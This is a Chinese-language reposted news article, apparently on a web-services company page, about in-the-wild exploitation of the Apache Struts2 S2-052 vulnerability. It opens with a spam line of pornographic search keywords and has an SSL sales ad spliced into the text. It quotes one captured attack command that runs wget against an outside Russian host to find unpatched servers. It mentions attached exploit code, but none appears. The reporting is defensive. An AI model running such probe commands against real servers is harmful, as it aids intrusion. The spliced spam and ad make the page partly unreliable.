日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
Struts2新漏洞(S2-052)出現(xiàn)利用實(shí)例,面對(duì)漏洞企業(yè)應(yīng)當(dāng)分秒必爭(zhēng)

9月5日,千瘡百孔的 Struts2 應(yīng)用又曝出存在新的高危遠(yuǎn)程代碼執(zhí)行漏洞(S2-052)。該漏洞由 lgtm.com 的安全研究員匯報(bào),編號(hào)為 CVE-2017-9805 ,漏洞危害程度為高危(Critical)。其實(shí),相似的漏洞已經(jīng)在 Struts 中多次發(fā)現(xiàn),今年早些時(shí)候攻擊者還利用了 Windows 服務(wù)器中的 Apache Struts 漏洞散發(fā) Cerber 勒索軟件。

酉陽(yáng)土家族苗族ssl適用于網(wǎng)站、小程序/APP、API接口等需要進(jìn)行數(shù)據(jù)傳輸應(yīng)用場(chǎng)景,ssl證書未來(lái)市場(chǎng)廣闊!成為創(chuàng)新互聯(lián)公司的ssl證書銷售渠道,可以享受市場(chǎng)價(jià)格4-6折優(yōu)惠!如果有意向歡迎電話聯(lián)系或者加微信:028-86922220(備注:SSL證書合作)期待與您的合作!

近日,來(lái)自思科 Talos 實(shí)驗(yàn)室和 NVISO 實(shí)驗(yàn)室的研究員也發(fā)現(xiàn),已經(jīng)有攻擊者真實(shí)利用了 S2-052 的漏洞。

事實(shí)上,漏洞爆出的第二天,就有研究人員利用這個(gè)漏洞進(jìn)行了滲透測(cè)試。

有一些研究人員表示,這個(gè)遠(yuǎn)程代碼利用漏洞與 Struts 反序列化處理不受信任的數(shù)據(jù)有關(guān),會(huì)影響自 2008 年以來(lái)所有版本的 Apache Struts,從 Struts 2.5 到 Struts 2.5.12。由于 Struts REST 通信插件在反序列化過(guò)程中無(wú)法合理處理 XML payloads,因此所有使用這個(gè)插件的 web 應(yīng)用都有可能遭到遠(yuǎn)程代碼執(zhí)行攻擊。目前財(cái)富 100 強(qiáng)的企業(yè)中,至少有 65% 的企業(yè)使用 Struts,因此,這些企業(yè)都應(yīng)當(dāng)提高警惕。

而來(lái)自 Contrast Security 的安全專家則表示:

這個(gè)漏洞只影響同時(shí)使用 Struts 2 和 Struts 2 REST 插件的應(yīng)用。ZDNet 對(duì)此漏洞影響的報(bào)道有些夸大,他們可能默認(rèn)了所有使用 Struts 2 的人都會(huì)使用 Struts 2 REST 插件。而我們所檢測(cè)到的數(shù)據(jù)顯示,我們所負(fù)責(zé)的 Java 應(yīng)用使用 Struts 2 REST 插件的比例不到 1%。來(lái)自 Maven 的數(shù)據(jù)顯示,Struts 2 核心庫(kù)擁有 167 名下游客戶,而 Struts 2 REST 插件庫(kù)則只有 9 名下游客戶,由此可以看出這個(gè)插件的應(yīng)用范圍和漏洞的影響范圍。

不論是影響范圍廣,還是影響范圍小,只要有漏洞,就有可能被攻擊者利用。

來(lái)自思科 Talos 實(shí)驗(yàn)室和 NVISO 實(shí)驗(yàn)室的研究員就表示,有攻擊者利用一個(gè)俄羅斯網(wǎng)站發(fā)送請(qǐng)求并搜集結(jié)果,檢測(cè)是否存在漏洞尚未修復(fù)的服務(wù)器,以便進(jìn)一步展開攻擊。

漏洞爆出后,我們很快就發(fā)現(xiàn)攻擊者利用這個(gè)漏洞的實(shí)例。目前,利用實(shí)例看起來(lái)只處于初步探測(cè)階段,同時(shí)會(huì)發(fā)出請(qǐng)求、檢測(cè)可能存在的未修復(fù)漏洞的目標(biāo)。如下是我們檢測(cè)到的發(fā)出 HTTP 請(qǐng)求的樣本。
 
 
 
 
  1. /bin/sh-cwget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite 

這個(gè)請(qǐng)求將會(huì)發(fā)起 wegt 請(qǐng)求,將 HTTP 的相應(yīng)結(jié)果寫入 /dev/null。這意味著這個(gè)請(qǐng)求純粹進(jìn)行的是瀏覽檢測(cè)活動(dòng),可以識(shí)別遠(yuǎn)程服務(wù)器上有哪些網(wǎng)站存在可被利用的漏洞。

NVISO 安全專家也檢測(cè)到了類似結(jié)果:

由于該行為向 /struts2-rest-showcase/orders/3 發(fā)送了 POST 請(qǐng)求,因此我們第一時(shí)間檢測(cè)到了這個(gè)活動(dòng)抓包結(jié)果顯示,這個(gè)活動(dòng)主要是為了探查存在漏洞的目標(biāo):抓包到的 payload 實(shí)際上是 /bin/sh 命令,能執(zhí)行某被入侵的俄羅斯網(wǎng)站發(fā)布的靜默 wget 命令,獲取請(qǐng)求瀏覽的網(wǎng)站名稱,而下載內(nèi)容則會(huì)被丟棄。

Talos 研究員還表示,這個(gè)活動(dòng)探測(cè)過(guò)程中,有可能會(huì)發(fā)送惡意文件。目前還在進(jìn)一步分析之中。

這再一次說(shuō)明,只要有漏洞爆出,黑客黑快就會(huì)進(jìn)行利用。在S2-052 漏洞爆出的 48 小時(shí)內(nèi),我們不斷監(jiān)測(cè)利用該漏洞的系統(tǒng)活動(dòng)。其實(shí)漏洞出現(xiàn)的第一時(shí)間就有補(bǔ)丁發(fā)布,但是黑客為了錢,還是能很快進(jìn)行逆向并開發(fā)出利用代碼。如今的網(wǎng)絡(luò)環(huán)境中,如果企業(yè)花幾星期甚至幾個(gè)月對(duì)漏洞進(jìn)行應(yīng)急響應(yīng)已經(jīng)來(lái)不及了?,F(xiàn)在需要在幾天或者幾小時(shí)內(nèi)迅速響應(yīng)才能避免更多損失。在應(yīng)急響應(yīng)中,企業(yè)應(yīng)當(dāng)分秒必爭(zhēng)。

以下附上攻擊實(shí)例利用代碼,僅做研究參考,嚴(yán)禁用于非法目的。


名稱欄目:Struts2新漏洞(S2-052)出現(xiàn)利用實(shí)例,面對(duì)漏洞企業(yè)應(yīng)當(dāng)分秒必爭(zhēng)
URL網(wǎng)址:http://www.dlmjj.cn/article/codjsii.html